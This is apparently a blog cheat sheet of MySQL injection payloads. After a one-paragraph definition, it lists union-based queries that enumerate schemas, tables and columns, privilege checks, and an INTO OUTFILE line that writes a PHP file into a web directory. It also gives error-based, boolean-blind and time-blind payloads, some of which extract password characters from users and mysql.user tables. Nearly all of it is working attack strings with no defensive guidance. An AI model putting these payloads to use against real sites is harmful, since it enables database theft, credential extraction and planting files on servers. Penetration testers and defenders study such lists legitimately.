MySQL injection summary

by do son ·

MySQL injection

Mysql injection is through the SQL command into the Web form submit or enter the domain name query string or page request, and ultimately to deceive the server to execute malicious SQL commands. Specifically, it leverages existing applications to inject (malicious) SQL commands into the background database engine, which can be exploited by typing (malicious) SQL statements into a Web site that has a security vulnerability Database, rather than according to the intention of the designer to execute SQL statements.

Mysql general injection (select)

  • Comment
    #
    /*

  • sql injection whitespace
    Use / **/ or () or + instead of spaces
    %0c = form feed, new page
    %09 = horizontal tab
    %0d = carriage return
    %0a = line feed, new line
  • Multiple data display

    concat()
    group_concat()
    concat_ws()

  • related functions
    system_user()
    user()
    current_user
    session_user()
    database()
    version() MYSQL
    load_file() MYSQL
    @@datadir
    @@basedir MYSQL
    @@version_compile_os

  • mysql general injection statement
    • View mysql basic information

      and 1=2 union select 1,2,3,concat_ws(char(32,58,32),0x7c,user(),database(),version()),5,6,7/*

    • Query the database
      and 1=2 union select 1,schema_name,3,4 from information_schema.schemata limit 1,1/*
      and 1=2 union select 1,group_concat(schema_name),3,4 from information_schema.schemata/*

    • Query table name

      and 1=2 union select 1,2,3,4,table_name,5 from information_schema.tables where table_schema=”Database hexadecimal encoding limit” 1,1/*

      and 1=2 union select 1,2,3,4,group_concat(table_name),5 from information_schema.tables where table_schema=”Database hexadecimal encoding”/*

    • Query field

      and 1=2 union select 1,2,3,4,column_name,5,6,7 from information_schema.columns where table_name=”Table name of the hexadecimal encoding” and table_schema=”Database hexadecimal encoding” limit 1,1/*

      and 1=2 union select 1,2,3,4,group_concat(column_name),5,6,7 from information_schema.columns where table_name=”Table name of the hexadecimal encoding” and table_schema=”Database hexadecimal encoding”/*

    • Determine if you have read and write permissions

      and (select count(*) from mysql.user)>0/*

      and (select count(file_priv) from mysql.user)>0/*

    • Write outfile

      union select 1,2,3,load_file(‘d:\web\logo123.jpg’),5,6,7,8,9,10,7 into outfile ‘d:\web\90team.php’/*

Mysql error injection

  • and(select 1 from(select count(*),concat((select (select (Statement)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
    Fill in the sentence sentence, such as: SELECT distinct concat(0x7e,0x27,schema_name,0x27,0x7e) FROM information_schema.schemata LIMIT 0,1
  • and+1=(select+*+from+(select+NAME_CONST((Statement),1),NAME_CONST(Statement),1))+as+x)–
  • update web_ids set host=’www.0x50sec.org’ where id =1 aNd (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((Select (Statement)),1,62)))a from information_schema.tables group by a)b);
  • insert into web_ids(host) values((select (1) from mysql.user where 1=1 aNd (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((Select (Statement)),1,62)))a from information_schema.tables group by a)b)));

Mysql general blind

  • Use ASCII
    AND ascii(substring((SELECT password FROM users where id=1),1,1))=49
  • Use regular expressions

    and 1=(SELECT 1 FROM information_schema.tables WHERE TABLE_SCHEMA=”blind_sqli” AND table_name REGEXP ‘^[a-n]’ LIMIT 0,1)

Mysql time blind

  • 1170 union select if(substring(current,1,1)=char(11),benchmark(5000000,encode(‘msg’,’by 5 seconds’)),null) from (select database() as current) as tbl
  • UNION SELECT IF(SUBSTRING(Password,1,1)=’a’,BENCHMARK(100000,SHA1(1)),0) User,Password FROM mysql.user WHERE User = ‘root’

Reference: pentestmonkey

Tags: mysql injection